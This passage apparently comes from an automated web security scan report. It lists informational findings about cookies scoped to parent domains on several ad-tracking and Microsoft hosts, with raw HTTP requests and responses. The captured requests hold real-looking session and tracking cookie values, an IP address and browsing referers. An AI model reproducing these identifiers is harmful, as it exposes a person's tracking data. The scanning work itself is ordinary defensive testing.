Set-Cookie: dmg2=2-null7566%4052%4076+57%3A56%3A60%3ACZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
Set-Cookie: hst2=3-lop3e3-1~89jazr1df64m~3mt~5al7~0-1~kx3bm41vejeq~3mt~5al7~1-1~1ksbhusx5p0nk~3mu~5al9~6-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
Set-Cookie: pct=1-vOrunivbe~gqe1232m-yhpvq~gqe1232n-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
Set-Cookie: rth=2-looqid-h1d~cvq~1~1-22063~cvm~1~0-dlx~0~1~1-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
Content-Length: 15382

document.write('\<img src=\"http://lm.trafficmp.com/clicksense/images/pixel.png?epic=7137432672015918080\&et=89jazr1df64m\" height=\"1\" width=\"1\"/\> \<scr');
document.write('ipt type=\"text/javas
...[SNIP]...

10.127. http://msdn.microsoft.com/magazine/ee336135.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msdn.microsoft.com
Path:	/magazine/ee336135.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /magazine/ee336135.aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; WT_NVR=0=/:1=en-us:2=en-us/magazine; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; s_cc=true; s_sq=%5B%5BB%5D%5D; msdn=L=1033; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7afbaee-3910-41b0-9f73-42c5d519d743&Microsoft.CreationDate=07/23/2011 02:01:25&Microsoft.LastVisitDate=07/23/2011 02:07:21&Microsoft.NumberOfVisits=5&SessionCookie.Id=48B6F0A73328302A2806841DC13E324C; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/23/2011 02:07:21&Microsoft.VisitStartDate=07/23/2011 02:01:25&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=114&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=b6d6365d4e204cf6ab451e30a23dcb6b

Response

HTTP/1.1 301 Moved Permanently
Location: http://msdn.microsoft.com/en-us/magazine/ee336135.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 02:07:36 GMT
Content-Length: 0

10.128. http://mssto.112.2o7.net/b/ss/msstoerrors/1/H.20.2--NS/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mssto.112.2o7.net
Path:	/b/ss/msstoerrors/1/H.20.2--NS/0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_fxxxxx7Fdnyydyxx=[CS]v4|2715169805012A6A-4000010AE034697F|4E2A2D1E[CE]; Expires=Thu, 21 Jul 2016 02:08:48 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/msstoerrors/1/H.20.2--NS/0?c1=error%20in%20omniGuidPath%20call&c2=TypeError&c3=Cannot%20call%20method%20%27toString%27%20of%20null&events=event1&v47=D%3DUser-Agent HTTP/1.1
Host: mssto.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/msdnmagazine/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4E0BD1B3[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4E0BD1B3[CE]; s_vi_x7Ex60x7Dcx7Cagrx7Ftx7Cx7Fwvx7Dtrgv=[CS]v4|27063138851627D0-40000182600A88A2|4E0C626D[CE]; s_vi_llmyibalobx7Ex7Caj=[CS]v4|270AE9A505158B0E-600001A2C04A9AE1|4E15D34A[CE]; s_vi_llmyibalobx7Ex7Caj=[CS]v4|270AE9A505158B0E-600001A2C04A9AE1|4E1654F8[CE]; s_vi_x7Dcgyx7Etx7Fgcgx7Fx7Cx22tuf=[CS]v4|2714B47A85012785-4000010B8019F06B|4E2968F3[CE]; s_vi_bx7Cxxfakx60xxx7Cxxx60ckjy=[CS]v4|2714B47A85012785-4000010B8019F06D|4E2968F3[CE]; s_vi_x7Faex7Bx7Cvx7Deaex7Dx7Eux7Ex7Dpsx7E=[CS]v4|2714B47A85012785-4000010B8019F066|4E2968F3[CE]; s_vi_x7Dcgyx7Etx7Fgcgx7Fx7Cux7Eqe=[CS]v4|2714B47A85012785-4000010B8019F069|4E2968F3[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 02:08:48 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fxxxxx7Fdnyydyxx=[CS]v4|2715169805012A6A-4000010AE034697F|4E2A2D1E[CE]; Expires=Thu, 21 Jul 2016 02:08:48 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Fri, 22 Jul 2011 02:08:48 GMT
Last-Modified: Sun, 24 Jul 2011 02:08:48 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E2A2D30-54BF-4ADBA7C5"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www87
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

10.129. http://odb.outbrain.com/utils/get previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/get

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

tick=1311428904052; Domain=outbrain.com; Path=/
_lvs2="j+h62nK2TPURNKjjEdyRnx2N9yctwBWzpsihGXuJnX/DefeUKLZcLYPoVy+pA8i3fTp6Cju1VRjpirRUEhLqCbVfZKqLBPSa"; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 18-Aug-2012 13:48:24 GMT; Path=/
_lvd2="qtpqO/EVmeM1+QgA/tr6aVDeiUxOdLZhyAHLjKAQtgVwkdgtXnAWOhwdtjL3zIPYc7Eb6If9sKC+6m534M6S+tr86htT0XnND9jIj29F2lirzsyOIrriqjYcVau3cxBoosYOorDJx60="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sat, 30-Jul-2011 02:36:24 GMT; Path=/
_rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 18-Aug-2012 13:48:24 GMT; Path=/
recs-6783b9b445294b239930e96e63a9d8bc="ssniaCEdLLCyT0VBCNucd96zW9hpo/RlpnaeJbVj5KbGy+og0xDlEssS2p5WMrQ7uXHTrjf+23TJhdbXU2M2CeiqZ6DT6sTTb0bge7ZGW1QxY4tiP17DbYybmwVWO1hZFKcUeOuwhgF5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Sat, 23-Jul-2011 13:53:24 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations&settings=true&recs=true&widgetJSId=AR_1&key=AYQHSUWJ8576&idx=0&version=40317&ref=&apv=false&rand=0.2596951636951417&sig=XLOTJivh HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=8212382c-a920-4555-8b81-259021933018; _lvs2="jIHpRjW4fRupx/ksspDebmqaTbfWC7yRNls1xBLluQgdIrCgnQmt8f0OG1e2lvOWewstTj20P33hLvNp2sFawtPR1Z6o06ly"; _lvd2="QxPkU7shPGw1+QgA/tr6aYpv6sU4XxpDvhpGUWAVbdxum3vhQDvhPUkHLqKwYK6HvK0fdQU6QtnC5iqvK3AtCibHcn7D4laysaiEITRU094c//0cei+APAvrLaQlRDc3ROcxJQPNhG8="; _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1311428904052; Domain=outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="j+h62nK2TPURNKjjEdyRnx2N9yctwBWzpsihGXuJnX/DefeUKLZcLYPoVy+pA8i3fTp6Cju1VRjpirRUEhLqCbVfZKqLBPSa"; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 18-Aug-2012 13:48:24 GMT; Path=/
Set-Cookie: _lvd2="qtpqO/EVmeM1+QgA/tr6aVDeiUxOdLZhyAHLjKAQtgVwkdgtXnAWOhwdtjL3zIPYc7Eb6If9sKC+6m534M6S+tr86htT0XnND9jIj29F2lirzsyOIrriqjYcVau3cxBoosYOorDJx60="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sat, 30-Jul-2011 02:36:24 GMT; Path=/
Set-Cookie: _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 18-Aug-2012 13:48:24 GMT; Path=/
Set-Cookie: recs-6783b9b445294b239930e96e63a9d8bc="ssniaCEdLLCyT0VBCNucd96zW9hpo/RlpnaeJbVj5KbGy+og0xDlEssS2p5WMrQ7uXHTrjf+23TJhdbXU2M2CeiqZ6DT6sTTb0bge7ZGW1QxY4tiP17DbYybmwVWO1hZFKcUeOuwhgF5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Sat, 23-Jul-2011 13:53:24 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 23 Jul 2011 13:48:23 GMT
Content-Length: 8906

outbrain_rater.returnedOdbData({'response':{'exec_time':18,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'219398422','req_id':'0f882f2a19ccda78353019fe27dacabc'},'score':{'preferred
...[SNIP]...

10.130. http://p.brilig.com/contact/bct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/contact/bct

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BriligContact=cfda7676-9f21-4c86-b307-99e594c4e9e6; Domain=.brilig.com; Expires=Sat, 13-Jul-2041 18:43:40 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/bct?pid=db87fbb1-7ab7-43ef-8be9-04bf8c66111d&_ct=pixel&REDIR=http://a.collective-media.net/datapair?net=vt HTTP/1.1
Host: p.brilig.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=Pubmatic&section=None&size=300x250&site=MYB
Cookie: bbid=AF3T0ZtvfNiS8n5ute4V6MxOq7wh9gs1wNTf-pOwShyGtPc05ECIyf18y-IKKgFQ_phFyOae3m-BfPHqrP1WJ_dHlkRfc-7LJvpeFml7opJiEzAyW-1PPXs; BriligContact=cfda7676-9f21-4c86-b307-99e594c4e9e6

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 21 Jul 2011 18:43:40 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 18:43:40 GMT
Set-Cookie: BriligContact=cfda7676-9f21-4c86-b307-99e594c4e9e6; Domain=.brilig.com; Expires=Sat, 13-Jul-2041 18:43:40 GMT
Location: http://a.collective-media.net/datapair?net=vt
Content-Length: 0
X-Brilig-D: D=3454
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: text/plain

10.131. http://pix04.revsci.net/A11149/a4/0/0/123.302 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/A11149/a4/0/0/123.302

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6m3VhBt3Axt0daA6gb/nRpMGg==; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 04:48:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /A11149/a4/0/0/123.302?tgt=http%3A%2F%2Fsegments.adap.tv%2Fdata%2F%3Fp%3Daudiencescience%26type%3Dgif%26seg_id%3D%7Btrimsegs%7D%26add%3Dtrue HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; rsiPus_BfLY="MLs3rEVrsC9jIDGy0Cr6w2KIBRM2QEEvGxl+IcEEDikn/fJzAhRw4xYGbyRjgd+L+CFNS1JTjB5SLtZJQydmBBtJ5JCqn91acX0fpo/DNU+UCg77BPc9day48OMT/K8xNuc1TLumxbyx9Hb2dHRGiucNUQFjn1UEHDNKdq9zdVx0XseN66/0zi5WPoqjD4glydhDlA=="; rsi_us_1000000="pUMd5c2kfxIU7Wwy3vbGk5VzsyIGDe01pwOkERxHPYcj6SIXnd79F+Ze0wTj1AE/6RAHP8i7Ucnn5MI2t/3zhGtjeUZ+Xiq0BOfdPkPGUVe4ui3kRMgGYGWr9eKP+Dc12hLb+X1aB9awXnfg/ESz2PKbvw4pYRTAyeoolWi6lrXJFcNgb0gkXVsc/apnrQIlPaMRkL3T5HJbjaVl5fAyWGFpTUvkCHGbVmBBakiBjr5Ysf4mCDxBy4DFlC03Px5jQNsqjTsnwhuS8jAfbhOhNxW9d3HwDvBQcMgrQw99mmieUqpEQI8hVc1YjYTdwAMTRtMe2n8aFfvekQ5QYzY2BNwInJ4QfBVfQlIUrG/FrSFadTxtTLBWdUYnDtZF8majBKgZ3w/rKHA10pU7xpJNOrStq0xnMDlZBzaHZRof8HR1YdxMNzQ8fJoQRkcPm8yX167pyt10oU+KkO+5aqB5mmM9x1Q3b43sLrakTJnbBcA/iYFSeaMfYT6X9DF796p3foNgKmNLsI1E8+x4QAWt/EVwhvYuaQ0OH8NC7M/50IxldJBCeCWvxl7393rXa1SBZ0qTaOs/cEYPENaflR9MLoji1YspQkbEUDDKGM7Ebu5fpBwzmjL/fKdy+DhJlWtZ8ymSQHayJIZRy8EnS3GHnfheNVyvUq/RWWF51HyvnhmpNBukzj5Xj4ICKX0eg+ls1GpI3f4KzUF9LNYDt9M9JCJbx35eW/hXvg71xEeY5Xaf"; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6m3VhBt3wztU9eA6wb/nT9MEg==

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6m3VhBt3Axt0daA6gb/nRpMGg==; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 04:48:32 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://segments.adap.tv/data/?p=audiencescience&type=gif&seg_id=&add=true
Content-Length: 0
Date: Sat, 23 Jul 2011 04:48:31 GMT

10.132. http://pix04.revsci.net/D08734/a1/0/3/0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4z+henIMH/C100a+jhgB5JQz9IZjavYaIGbgejnlu1LNx+p24I1oDZUR/PIEreL1khOld6I67wyCcvrDjgnPXWfftsVz6gi2U+R4C2HA1xNHMznYAaikEDYBtaPV2XgkSL49sR1LHELURF80qJ24YXWBjJG///bIMfJGqlOw4Z4AZ3CFoTpDon75FV/NMnS9d7+7BoPMcvYpkrNJjjSncbWRokElhKIqZ0wJF9tLA8AVKLKQnIom91GqEmtEhM5XY0AatgHAIlbu+jKhn7uSasiHr74K5PeGMCi1DXS91gFPiUVPN7NZjpaMjeUkVvvBEhtaCpyjQkkG9jLQQ3K8F9JXFdrzMA8MDWGlZ+Vju7e7eWtnHFWU3gOpKn7gPs31PEE1DiD2CZapLXs7AIbyuDDoWXF6ktBBStu0k56KlcXhvOA+mj6A6PgjB4ALyhPu3oeMTIALjZn3hx2WIVWWKybwlEZ10BC4K7+umeJXXurtrvh7lSNk2KhUazcIMzy7DuynwDAilMbbbmsoo4vojZLD0nQfSTwk4boSw0q2h3KsvO/zGi+l+gt/Wyw3bO7qyU6Ncw4h5TjyHLQOLJTDSgAx92fnqrLLEyJuCK4wlmsCrb6KROgq885iXyLw2iBH1f1Xz2vUmnkx3wgRyaUKX/L6O2NlT1599Fgobn/4FWXhjyVT6MUK1GdNbwalGQnmK2G/mWTUnr23ChWE5vMzJkLCyrpJF9qetK+qXvvwrzIJhHe9vRi9jbIrOuclFZP96Ajz7EXC3BMGtQpfo0uCHbmmgKh1; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 04:31:01 GMT; Path=/
udm_0=MLv3NzMJZjpn3hepL/sKOQzMPAgC9snnjELcqFbWhmRKTjkEarwaUQo9AQIc2HCTUsGSvg7FWc1FuYZjdc3F+16bIw7iBeJkNHcwDY154WjqYiYrsKNH4H1dy334j5gm5nSWh6u+GJ1X3wmqvojunnI5GoE7vEdN8KAD+4IgUpnKAaBCpxqXaQcl9qnb8OmIA4N+GstG9gmvg1EwKlcao2a4KpqrPAFBCfIz7tSr5mPwLkbDxlHpBCucior6IpWdhKtNyoy/88gXxj8uVMRW/Gh553T7eDk8VOVxE8UJJWdOX7p4qGhiCmfOHzFRhvKbvaqm+izgkMtH39Cch3LcT46U2NLrli0ewvymJU6mJYvahJvzgkDm5rt+1mkpQ+tOB4lSn/ZP7BRoT5knVtscyXaOaw0QTGGtvhyiltPuQhUn/iI8B1nXx1a5U7mlkzCTINROWxWb3e6xNnVLz3l2ak9ydVrN1jwtpswKUoPc7UBxKQT0cHinvn42TRKv9O4CieL8sgrPi/vCXu1Q13I5e62QGSfFQW+e1mvhOZwSnLECxdtefZKXR5jGRDOS9r2eK92BmHb/KGQtdUqP3v0gIz0/GPnZPS2m0Mw5/6/oA4kloLsdkdUWKyF45A31s4Gx/Ui0f0BK8gtigHxQ+KAcpHfdhlQZ3Gmkel8KNANjANV3WZS4FER1yBnZiQU4NgZDZdgTup7KYS+n5sVFcnqyAp82Bp/t+5gHRHbif44H6kBDey6tys8Znm4Sy8nzRr08sDVMi9vaodKux4gzJ4E1/VMC2SoiA8K/TXIij46AvltYt2wKBA9SOjyANGPxOgDxzX4zt/9H1QMydTyCdFyzkJ8p7Wl10PcblUXPqFXH8DqbgvCKOkeIqwk7OENLiCI/C4wnE3cYvdnM9QN8nYm9M9Oj4sQK+N5ow7Nesa0VGPGDd8S7gfLVr5E1mN497xp2rgs23SiNwGJM+S4Lf/nqLJz94Q2ooQpv4EGwK023hl2hjQXO1rb4dDIaify9MHWRnqay9hP9FpWTWj4SMmWalGeeTsDbHYckfFs97XBnMS5I8/lnC+bVOxZRYfQb/OId2njIq2AjyBNVJOMV/LWW3+eLaSr3NuHLxOEkcAH0FeVEO7GmsSHWzo0ObLc8sEWg/UpuMnaQfZIIXbi9nx2oES+Oy3J4qd53X9y5p/whPjwfkp4tYRaD6f/EDcBJ+ywWJqVTmXb/AWlYzQKE9BHTlsObIf3TRKh5s9/WcQeAXoVDXrOWxxfHWWSuDhA8GB+7ihZf1plL8rbOHPfmCIniQDfmE/1wVs1FuF3zNQuvFpwLFjz1iagCgq/TNqHIXeMUwQOmErB957UgSfbzaYZCBvOtTsA/Wz0Bw1ZdNLxbdXYMu+HDeW712rfJoYl9XYEon3pooXuoMuohTU9crJ/jjqLMiRxUuxG/7Kgd26dlxtxmqYl9UaJTUc2shrP6Jhi4cTogy1HbiJdfS6K5b9nXpMZoyE+aW0nEzLmvXKHNFQWw49neIQvdt8FotPwZSkHcoCedkD89b5wzCDwEBJYED2Dpp0K6Ca7oNaOtdvO7GrnXhvPw3JKzmkB20gj7MEHNb8jOR+ulgL6kEPuiW6sDAhZ40eiJ3JrVjvn4DTpfXGcgBRg5lUrD4mtyfjFnDCFuyeedSmFPo0xd4RAxioEVFdXRsx8lrgZwLJNDIXvKah5iX513JiE5+GA/Szm0X2DD6vuiDlHkzqxi8C+azXz9IuAn9Z9k00gHjGhrDzYSdvYimeF1M6dJ4aQPL4h0ICE5eGDfnejinVFdwbUrDZq2BnpYgZloN/DKzM/Hd9CZ5wswSCrXmiBjAtdi; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 04:31:01 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fti.com%253Fscore%253D000%2526zip%253D%2526byear1%253D%2526sex1%253D%2526ts1%253D%2526byear2%253D%2526sex2%253D%2526ts2%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
